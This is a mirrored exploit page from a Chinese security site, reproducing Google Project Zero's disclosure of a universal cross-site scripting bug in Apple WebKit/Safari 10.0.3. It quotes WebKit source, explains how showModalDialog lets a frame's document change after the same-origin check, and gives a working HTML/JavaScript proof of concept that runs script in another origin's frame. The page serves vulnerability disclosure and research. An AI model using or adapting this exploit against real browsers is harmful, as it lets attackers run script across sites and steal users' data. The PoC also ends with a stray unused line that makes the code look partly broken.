首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple WebKit / Safari 10.0.3 (12602.4.8) - Synchronous Page Load Universal Cross
来源:Google Security Research 作者:Google 发布时间:2017-04-12  
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1121
 
Here's a snippet of the method SubframeLoader::requestFrame which is invoked when the |src| of an iframe object is changed.
 
bool SubframeLoader::requestFrame(HTMLFrameOwnerElement& ownerElement, const String& urlString, const AtomicString& frameName, LockHistory lockHistory, LockBackForwardList lockBackForwardList)
{
    // Support for <frame src="javascript:string">
    URL scriptURL;
    URL url;
    if (protocolIsJavaScript(urlString)) {
        scriptURL = completeURL(urlString); // completeURL() encodes the URL.
        url = blankURL();
    } else
        url = completeURL(urlString);
 
    if (shouldConvertInvalidURLsToBlank() && !url.isValid())
        url = blankURL();
 
    Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList); <<------- in here, the synchronous page load is made.
    if (!frame)
        return false;
 
    if (!scriptURL.isEmpty())
        frame->script().executeIfJavaScriptURL(scriptURL); <<----- boooom
 
    return true;
}
 
A SOP violation check is made before the above method is called. But the frame's document can be changed before |frame->script().executeIfJavaScriptURL| called. This can happen by calling |showModalDialog| that enters a message loop that may start pending page loads.
 
Tested on Safari 10.0.3(12602.4.8).
 
PoC:
-->
 
<body>
<p>click anywhere</p>
<script>
 
window.onclick = () => {
    window.onclick = null;
 
    f = document.createElement('iframe');
    f.src = 'javascript:alert(location)';
    f.onload = () => {
        f.onload = null;
 
        let a = f.contentDocument.createElement('a');
        a.href = 'https://abc.xyz/';
        a.click();
 
        window.showModalDialog(URL.createObjectURL(new Blob([`
<script>
let it = setInterval(() => {
    try {
        opener[0].document.x;
    } catch (e) {
        clearInterval(it);
 
        window.close();
    }
}, 100);
</scrip` + 't>'], {type: 'text/html'})));
    };
 
    document.body.appendChild(f);
};
 
cached.src = kUrl;
 
</script>
</body>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Brother MFC-J6520DW - Authenti
·Apple WebKit / Safari 10.0.3 (
·Quest Privilege Manager 6.0.0
·Apple WebKit - 'JSC::B3::Proce
·Adobe Multiple Products - XML
·Apple WebKit - 'Document::adop
·Proxifier for Mac 2.17 / 2.18
·Apple WebKit - 'JSC::SymbolTab
·Wordpress webplayer Plugins SQ
·Proxifier 2.19 Privilege Escal
·Moxa MX AOPC-Server 1.5 - XML
·XiongMai uc-http 1.0.0 Local F
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved